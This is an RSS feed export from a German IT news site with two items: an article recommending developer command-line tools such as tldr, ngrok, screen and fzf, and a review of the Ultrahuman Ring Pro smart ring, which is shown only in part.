<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=multitask+with+parallel+chats%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Fri, 31 Jul 2026 04:22:02 +0200</lastBuildDate>
<pubDate>Fri, 31 Jul 2026 04:22:02 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=multitask+with+parallel+chats%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=multitask+with+parallel+chats%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[9 Kommandozeilen-Tools, die jeder Dev braucht]]></title>
<description><![CDATA[Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.
					Foto: SkillUp | shutterstock.com




Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie lieben – andere, weil ihnen nich...]]></description>
<link>https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." title="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." src="https://images.computerwoche.de/bdb/3392868/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.</p></figcaption></figure><p class="imageCredit">
					Foto: SkillUp | shutterstock.com</p></div>




<p class="wp-block-paragraph">Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" title="lieben" target="_blank">lieben</a> – andere, weil ihnen nichts anderes übrig bleibt. Egal zu welcher Kategorie Sie sich zählen: Diese neun CLI-Tools helfen Ihrer Produktivität und Effizienz (zusätzlich) <a href="https://www.computerwoche.de/article/2816175/so-motivieren-sie-softwareentwickler.html" title="auf die Sprünge" target="_blank">auf die Sprünge</a>.</p>



<h2 class="wp-block-heading"><a href="https://tldr.sh/" target="_blank" rel="noreferrer noopener">tldr</a></h2>



<p class="wp-block-paragraph">Keine Angst, wir ersparen Ihnen an dieser Stelle eine langwierige, faszinative Abhandlung über die ganz eigene Magie, die die Unix-Shell entfaltet. Fakt ist: Wenn man mit ihr arbeiten will, ist es manchmal erforderlich, vorher ein Handbuch zu lesen. Unix Docs (auch man- oder manual pages) sind diesbezüglich allerdings ein zweischneidiges Schwert: Die benötigte Information ist vorhanden – es ist nur die Frage, wo. Den Teil der <a href="https://www.computerwoche.de/article/2791591/so-erstellen-sie-eine-moderne-dokumentation-fuer-anwendungen.html" title="Dokumentation" target="_blank">Dokumentation</a> aufzuspüren, den Sie gerade benötigen, kann ein entmutigender Task sein. Zwar kann die gute alte Befehlszeile dabei helfen – um ein offizielles Handbuch aufzurufen, genügt:</p>



<p class="wp-block-paragraph"><code>$ man </code></p>



<p class="wp-block-paragraph">Allerdings zeichnen sich man-pages vor allem durch ihre Informationsdichte aus – und die Tatsache, dass sie manchmal aktuelle Informationen für neuere Tools vermissen lassen. Das CLI-Tool <code>tldr</code> versetzt Sie in die Lage, zielgerichteter zu suchen:</p>



<p class="wp-block-paragraph"><code>$ tldr </code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="tldr in Aktion." title="tldr in Aktion." src="https://images.computerwoche.de/bdb/3392869/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">tldr in Aktion.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Falls Sie <code>npm</code> installiert haben, ist die <code>tldr</code>-Installation nur einen kurzen Befehl entfernt:</p>



<p class="wp-block-paragraph"><code>npm install -g tldr</code></p>



<h2 class="wp-block-heading"><a href="https://ngrok.com/download" target="_blank" rel="noreferrer noopener">ngrok</a></h2>



<p class="wp-block-paragraph">Sobald Sie <code>tldr</code> installiert haben, können Sie damit viele weitere Befehle erkunden. Zum Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr ngrok</code></p>



<p class="wp-block-paragraph"><code>Reverse proxy that creates a secure tunnel from a public endpoint to a locally running web service.</code></p>



<p class="wp-block-paragraph">Mit <code>ngrok</code> eröffnet sich Ihnen eine stressfreie Möglichkeit, von einem Remote-Browser auf eine Entwicklungsmaschine zuzugreifen. Aber das Tool kann noch weit mehr. Sie können damit beispielsweise in der Cloud entwickeln und die Ergebnisse im Browser in Augenschein nehmen. Zudem können Sie mit <code>ngrok</code> auch schnell und einfach laufende Services über HTTPS veröffentlichen – ohne sich mit der Security-Infrastruktur herumschlagen zu müssen. Angenommen, Sie bauen einen Service Worker auf, der HTTPS benötigt, dann ist alles, was Sie für einen sicheren Kontext tun müssen, <code>ngrok</code> zu starten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." title="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." src="https://images.computerwoche.de/bdb/3392870/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Ein Beispiel, bei dem der HTTP-Port 8080 freigegeben wird:</p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph">Der <code>ngrok</code>-Output sieht wie folgt aus:</p>



<p class="wp-block-paragraph"><code>https://f951-34-67-117-59.ngrok-free.app -&gt; <a href="https://localhost:8080/" title="http://localhost:8080" target="_blank" rel="noopener">http://localhost:8080</a></code></p>



<p class="wp-block-paragraph">Anschließend kann jedermann die zugewiesene URL aufrufen (machen Sie sich keine Mühe).</p>



<h2 class="wp-block-heading"><a href="https://www.gnu.org/software/screen/manual/screen.html" target="_blank" rel="noreferrer noopener">screen</a></h2>



<p class="wp-block-paragraph">Mit diesem Befehlszeilen-Tool können Sie eine Shell-Sitzung mit oder ohne laufenden Prozess “beiseite legen” und sie anschließend zu einem beliebigen Zeitpunkt fortsetzen – auch wenn Sie die ursprüngliche Session beenden.</p>



<p class="wp-block-paragraph"><code>$ tldr screen</code></p>



<p class="wp-block-paragraph"><code>Hold a session open on a remote server. Manage multiple windows with a single SSH connection.</code></p>



<p class="wp-block-paragraph">Nehmen wir an, Sie starten <code>ngrok</code>, um remote auf eine <a href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" title="Webanwendung" target="_blank">Webanwendung</a> zuzugreifen: Sie starten den Prozess, lassen diesen dann in <code>screen</code> laufen und programmieren so lange etwas. Währenddessen läuft <code>ngrok</code> die ganze Zeit weiter – Sie können über <code>screen</code> jederzeit wieder darauf zugreifen. Veranschaulicht in Code würde das wie folgt aussehen:</p>



<p class="wp-block-paragraph"><code>$ screen</code></p>



<p class="wp-block-paragraph"><code>// Now we are in a new session</code></p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph"><code>// Now ngrok is running, exposing http port 8080</code></p>



<p class="wp-block-paragraph"><code>Type ctrl-a</code></p>



<p class="wp-block-paragraph"><code>// Now we are in screen's command mode</code></p>



<p class="wp-block-paragraph"><code>Type the "d" key, to "detach".</code></p>



<p class="wp-block-paragraph"><code>// Now you are back in the shell that you started in, while screen is running your ngrok command in the background:</code></p>



<p class="wp-block-paragraph"><code>$ screen -list</code></p>



<p class="wp-block-paragraph"><code>There is a screen on:</code></p>



<p class="wp-block-paragraph"><code> 128861.pts-0.dev3 (04/25/24 14:36:58) (Detached)</code></p>



<p class="wp-block-paragraph"><strong>Tipp</strong></p>



<p class="wp-block-paragraph"> Wenn Sie eine laufende Sitzung, in der Sie sich gerade befinden, benennen wollen, nutzen Sie die Tastenkombination Strg + A und geben <code>:sessionname </code> ein. Das ist besonders nützlich, wenn Sie mit mehreren Screen-Instanzen arbeiten wollen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Screen ist ein umfangreiches und potentes CLI-Tool." title="Screen ist ein umfangreiches und potentes CLI-Tool." src="https://images.computerwoche.de/bdb/3392871/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Screen ist ein umfangreiches und potentes CLI-Tool.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Wenn wie im Beispiel nur eine <code>screen</code>-Instanz läuft, führt der Befehl <code>$ screen -r</code> (für “re-attach”) Sie zurück zu Ihrer <code>ngrok</code>-Sitzung. Im Fall mehrerer Screens können Sie diese mit Hilfe ihrer ID wieder aufrufen:</p>



<p class="wp-block-paragraph"><code>$ screen -r </code></p>



<p class="wp-block-paragraph">Wenn Sie Ihre Session endgültig beenden wollen, beenden Sie ngrok mit Strg + C und geben anschließend <code>exit</code> in die Kommandozeile ein.</p>



<h2 class="wp-block-heading"><a href="https://sdkman.io/" target="_blank" rel="noreferrer noopener">sdkman</a> &amp; <a href="https://github.com/nvm-sh/nvm" target="_blank" rel="noreferrer noopener">nvm</a></h2>



<p class="wp-block-paragraph">Wenn Sie <a href="https://www.computerwoche.de/article/2831436/darum-bleibt-java-relevant.html" title="Java" target="_blank">Java</a> oder <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="JavaScript" target="_blank">JavaScript</a> auf einem Server verwenden, sollten Sie sich mit <code>sdkman</code> (für Java) und <code>nvm</code> (für Node) vertraut machen. Beide Kommandozeilen-Tools sind nützlich, wenn es darum geht, mit mehreren Programmiersprachenversionen auf dem selben Rechner zu jonglieren – und dabei sowohl Path Adjustment als auch Umgebungsvariablen überflüssig machen. </p>



<p class="wp-block-paragraph">Mit <code>sdkman</code> können Sie beispielsweise neuere Java-Versionen erkunden und anschließend wieder zum aktuellen LTS-Release springen. Dieser Prozess wird durch das <code>sdk</code>-Kommando abstrahiert.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." title="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." src="https://images.computerwoche.de/bdb/3392872/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an – inklusive derjenigen, die gerade in Benutzung ist.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Zwischen den Versionen zu wechseln, gestaltet sich denkbar einfach – <code>$ sdk use java 19-open</code> führt Sie direkt zu JDK Version 19.</p>



<p class="wp-block-paragraph"><code>$ tldr sdk</code></p>



<p class="wp-block-paragraph"><code>Manage parallel versions of multiple Software Development Kits.</code></p>



<p class="wp-block-paragraph"><code>Supports Java, Groovy, Scala, Kotlin, Gradle, Maven, Vert.x and many others.</code></p>



<p class="wp-block-paragraph">Die <code>nvm</code>-Utility funktioniert ganz ähnlich:</p>



<p class="wp-block-paragraph"><code>$ tldr nvm</code></p>



<p class="wp-block-paragraph"><code>Install, uninstall or switch between Node.js versions.</code></p>



<p class="wp-block-paragraph"><code>Supports version numbers like "12.8" or "v16.13.1", and labels like "stable", "system", etc.</code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Ein Blick auf nvm." title="Ein Blick auf nvm." src="https://images.computerwoche.de/bdb/3392873/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Ein Blick auf nvm.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/junegunn/fzf" target="_blank" rel="noreferrer noopener">fzf</a></h2>



<p class="wp-block-paragraph">Sowohl <code>grep</code> als auch <code>find</code> sind Standardbestandteile der Kommandozeilen-Befehlspalette. Allerdings sind beide Tools nicht so funktional, wie sie sein sollten. Das ruft <code>fzf</code> auf den Plan – einen “Fuzzy File Finder”. Mit “Fuzzy” ist dabei gemeint, dass die Details zu dem, was Sie suchen, nicht unbedingt klar definiert sein müssen. Ein Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr fzf</code></p>



<p class="wp-block-paragraph"><code>Command-line fuzzy finder.</code></p>



<p class="wp-block-paragraph"><code>Similar to sk.</code></p>



<p class="wp-block-paragraph">Sobald Sie <code>fzf</code> starten, indiziert das CLI-Tool umgehend das Dateisystem, um Ergebnisvorschläge für Ihre Suchen zu unterbreiten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." title="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." src="https://images.computerwoche.de/bdb/3392874/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Aus 878.937 Möglichkeiten hat <code>fzf</code> die 25 Dateien und Verzeichnisse ausgewählt, die unseren Anforderungen entsprechen könnten – und das völlig ohne Umwege.</p>



<h2 class="wp-block-heading"><a href="https://github.com/ogham/exa" target="_blank" rel="noreferrer noopener">exa</a></h2>



<p class="wp-block-paragraph">Mit <code>exa</code> werden langweilige alte <code>ls</code>-Listings schöner und nützlicher:</p>



<p class="wp-block-paragraph"><code>$ tldr</code></p>



<p class="wp-block-paragraph"><code>A modern replacement for ls (List directory contents).</code></p>



<p class="wp-block-paragraph">Für eine <a href="https://www.computerwoche.de/article/2834060/10-wege-zur-besseren-developer-experience.html" title="bessere Developer Experience" target="_blank">bessere Developer Experience</a> ohne mentalen Overhead statten Sie <code>ls</code> einfach mit einem <code>exa</code>-Alias aus. Das Tool respektiert die meisten <code>ls</code>-Standardoptionen – <code>exa -l</code> funktioniert also (beispielsweise) genau so, wie Sie es erwarten würden.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Exa ist das neue ls." title="Exa ist das neue ls." src="https://images.computerwoche.de/bdb/3392875/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Exa ist das neue ls.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/sharkdp/bat" target="_blank" rel="noreferrer noopener">bat</a></h2>



<p class="wp-block-paragraph">Die <code>bat</code>-Utility ähnelt dem <code>cat</code>-Tool – ist aber besser:</p>



<p class="wp-block-paragraph"><code>$ tldr bat</code></p>



<p class="wp-block-paragraph"><code>Print and concatenate files.</code></p>



<p class="wp-block-paragraph"><code>A cat clone with syntax highlighting and Git integration.</code></p>



<p class="wp-block-paragraph">Es handelt sich hierbei im Wesentlichen um eine Komfort- beziehungsweise <a href="https://www.computerwoche.de/article/2821891/8-wege-um-top-entwickler-zu-halten.html" title="Developer-Experience-Optimierung" target="_blank">Developer-Experience-Optimierung</a> – ähnlich wie im Fall von <code>exa</code>. Wenn Sie <code>bat</code> verwenden, erwartet Sie ein vollwertiger File Viewer – inklusive Title, Borders, Line Numbers und insbesondere einer hilfreichen Syntax-Highlighting-Funktion für Programmiersprachen oder Konfigurationsdateien. Dabei reagiert <code>bat</code> auf less/more-Befehle – und wird mit “<code>q</code>” beendet. Die Navigation erfolgt über die Pfeiltasten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." title="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." src="https://images.computerwoche.de/bdb/3392876/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/NetHack/NetHack" target="_blank" rel="noreferrer noopener">nethack</a></h2>



<p class="wp-block-paragraph">Ein absoluter Kommandozeilen-Klassiker ist <code>nethack</code> – der ursprüngliche, Konsolen-basierte ASCII <a href="https://de.wikipedia.org/wiki/NetHack" title="Dungeon Crawler" target="_blank" rel="noopener">Dungeon Crawler</a>. Das CLI-Tool wird Ihre Produktivität zwar nicht direkt ankurbeln – kann aber durchaus dabei helfen, ein paar Minuten zur Ruhe zu kommen, um komplexe Dev-Probleme zu durchdringen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." title="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." src="https://images.computerwoche.de/bdb/3392877/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Es gibt neuere Versionen des Nethack-Konzepts – manchmal fährt man jedoch mit dem Original am besten.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2337138/9-command-line-jewels-for-your-developer-toolkit.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.<br></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ultrahuman Ring Pro im Test: Ohne Abonnement und langlebig]]></title>
<description><![CDATA[Mike Sawh



Auf einen Blick



Pro




Insgesamt solide Tracking-Leistung



Ansprechende Begleit-App mit einigen nützlichen Modi



Beeindruckende Akkulaufzeit



Ohne Abonnement




Kontra




Hoher Preis



Klobiges Design



Softwarefunktionen entsprechen weitgehend denen des Air




Fazit

...]]></description>
<link>https://tsecurity.de/de/3694425/it-security-nachrichten/ultrahuman-ring-pro-im-test-ohne-abonnement-und-langlebig/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694425/it-security-nachrichten/ultrahuman-ring-pro-im-test-ohne-abonnement-und-langlebig/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.10.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200751" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<h3 class="wp-block-heading">Auf einen Blick</h3>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Insgesamt solide Tracking-Leistung</li>



<li>Ansprechende Begleit-App mit einigen nützlichen Modi</li>



<li>Beeindruckende Akkulaufzeit</li>



<li>Ohne Abonnement</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Hoher Preis</li>



<li>Klobiges Design</li>



<li>Softwarefunktionen entsprechen weitgehend denen des Air</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Der Ultrahuman Ring Pro bietet ein hervorragendes Hardware- und Software-Erlebnis und zählt damit zu den besten Smart-Ringen. Das Problem ist der hohe Anschaffungspreis, ganz zu schweigen davon, dass die Konkurrenz – sowohl bei Modellen mit als auch ohne Abonnement – für manche Nutzer attraktivere Eigenschaften bieten kann.</p>



<p class="wp-block-paragraph">Der Ultrahuman Ring Pro ist der neueste <a href="https://www.pcwelt.de/article/3063681/bester-smart-ring-test.html" target="_blank">Smart-Ring</a> eines Unternehmens, das sich seit Langem im Konflikt mit Oura befindet. Nachdem der Verkauf seines Vorgängermodells in den USA vorübergehend untersagt worden war, kehrt Ultrahuman nun mit einem neuen Ring zurück, der über neu gestaltete Sensoren, eine verbesserte Prozessorleistung und eine längere Akkulaufzeit verfügt.</p>



<p class="wp-block-paragraph">Der <a href="https://www.pcwelt.de/article/3063689/ultrahuman-ring-air-test-2.html" target="_blank">Ring Air</a> ist weiterhin als günstigere Alternative zum Pro erhältlich, doch wenn Sie das Beste wollen, was Ultrahuman zu bieten hat, ist dieser hier die richtige Wahl.</p>



<p class="wp-block-paragraph">Leider sind die Preise für die Ringe von Ultrahuman – ähnlich wie bei dem ebenfalls abonnementfreien Konkurrenten RingConn – leicht gestiegen, was bedeutet, dass sich der Pro wirklich hervorheben muss, um die höheren Kosten zu rechtfertigen und zu einer der ersten Wahl unter den Smart-Ringen zu werden.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>Erhältlich in vier Farbvarianten</li>



<li>Dickeres Design als der Ring Air</li>



<li>Ladeetui im Lieferumfang enthalten</li>
</ul>



<p class="wp-block-paragraph">Der Ring Pro ist ein Smart-Ring mit einem schlichten Design, der in vier verschiedenen Farben erhältlich ist: Bionic Gold, Space Silver, Aster Black und Raw Titanium. Der Kern des Rings besteht aus Titan mit einer PVD-Beschichtung, die ihn vor Kratzern schützt. Ich habe festgestellt, dass frühere Ultrahuman-Ringe zu den am leichtesten zu zerkratzenden gehörten. Daher freue ich mich, dass der Pro Kratzer besser abwehrt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.15.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200752" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Genau wie der Air ist auch der Pro in den Ringgrößen 5–14 erhältlich und bis zu einer Tiefe von 100 Metern wasserdicht. Ich habe mich für dieselbe Größe wie beim Air entschieden, und die Passform scheint ähnlich zu sein, wenn nicht sogar insgesamt etwas besser, da der Ring seltener an meinem Finger herumrutscht. Er ist sehr bequem und sitzt gut am Finger. Man spürt zwar die Sensoren, doch sie sind nicht so deutlich spürbar wie bei früheren Modellen.</p>



<p class="wp-block-paragraph">Im Vergleich zum Ring Air von Ultrahuman erhalten Sie einen schwereren und dickeren Ring. Da ich den <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" target="_blank">Oura Ring 5</a> gleichzeitig getragen habe, wirkt der Pro deutlich größer als der neueste Ring von Oura.</p>



<p class="wp-block-paragraph">Der Pro wird mit einem Ladecase geliefert, und obwohl man es nicht mit dem neuen Case von Oura verwechseln würde, verfügt es über ein ähnlich robustes Metall-Design, das den Ring schützt, wenn er nicht am Finger getragen wird. Das Etui verfügt über zusätzliche intelligente Funktionen wie kabelloses Laden, einen „Find-my-Case“-Modus für den Fall, dass Sie es verlegen, ganz zu schweigen von der Möglichkeit, Ringdaten bis zu einem Jahr lang zu speichern.</p>



<p class="wp-block-paragraph">Ein interessanter Aspekt des Designs ist, dass Ultrahuman den Ring so konzipiert hat, dass er im Falle einer Schwellung leicht durchtrennt und entfernt werden kann. Auch wenn ich hoffe, dass niemand jemals in eine solche Situation gerät, ist es beruhigend zu wissen, dass sich der Ring in einem Notfall problemlos entfernen lässt.</p>



<h2 class="wp-block-heading">Fitness &amp; Tracking</h2>



<ul class="wp-block-list">
<li>Überarbeitete Temperatur- und Herzfrequenzsensoren</li>



<li>Neuer Dual-Core-Prozessor</li>



<li>Powerplugs bieten zusätzliche Funktionen gegen Aufpreis</li>
</ul>



<p class="wp-block-paragraph">Der Ring Pro kann so gut wie alles überwachen, was auch der Air kann. Dazu gehören Herzfrequenz, Schlaf, Stress, Temperatur und die tägliche Schrittzahl. Die größte Änderung besteht darin, dass die optischen Sensoren, die zur Erfassung dieser Messwerte verwendet werden, überarbeitet wurden und nun klarere Signale liefern, um Schlaf- und Erholungsdaten zu erfassen.</p>



<p class="wp-block-paragraph">Diese Neugestaltung scheint zudem mit den Patentstreitigkeiten mit Oura in Zusammenhang zu stehen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.19.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200753" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Die App, die diese Daten anzeigt, gehört zu den ausgereiftesten, die Sie bei einem Smart-Ring finden können. Sie steht der Oura-App in nichts nach, was die ansprechende Aufbereitung Ihrer Daten angeht, und regt Sie dazu an, sich tatsächlich damit auseinanderzusetzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.33.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200754" width="1024" height="571" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Was die Erfassung der Kerndaten angeht, müssen Sie die zweiwöchige Kalibrierungsphase unbedingt durchlaufen, bis Sie zuverlässige Ergebnisse erhalten. Die Daten zu den durchschnittlichen Herzfrequenzwerten wiesen während dieses Zeitraums erhebliche Abweichungen auf, stabilisierten sich jedoch nach diesen zwei Wochen.</p>



<p class="wp-block-paragraph">Die Daten zur Ruheherzfrequenz und die Messungen der Herzfrequenzvariabilität stimmten besonders gut mit zwei anderen Trackern überein, die ich parallel zum Pro trug.</p>



<p class="wp-block-paragraph">Bei der Betrachtung der Schrittzahlen stellte ich fest, dass die gemeldeten Gesamtwerte deutlich niedriger waren als bei zwei anderen Trackern, mit denen ich den Pro verglichen habe.</p>



<p class="wp-block-paragraph">Die Leistung bei der Schlafaufzeichnung gehört zu den besten, die ich getestet habe, einschließlich Oura. Was die Schlafdauer, die Aufschlüsselung der Schlafphasen und den erfassten Zeitpunkt des Einschlafens betrifft, lieferte der Pro zuverlässige Werte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.42.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200755" width="1024" height="543" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



